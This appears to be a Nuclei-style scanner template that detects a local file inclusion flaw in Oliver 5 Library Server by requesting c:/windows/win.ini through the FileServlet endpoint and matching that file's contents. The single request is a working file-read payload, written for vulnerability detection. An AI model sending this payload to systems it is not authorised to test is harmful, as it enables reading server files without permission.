id: oliver-library-lfi

info:
  name: Oliver 5 Library Server <8.00.008.053 - Local File Inclusion
  author: gy741
  severity: high
  description: Oliver 5 Library Server versions prior to 8.00.008.053 are vulnerable to local file inclusion via the FileServlet function.
  reference:
    - https://www.exploit-db.com/exploits/50599
    - https://www.softlinkint.com/product/oliver/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,oliver,edb,windows

requests:
  - method: GET
    path:
      - "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by mp on 2022/08/04
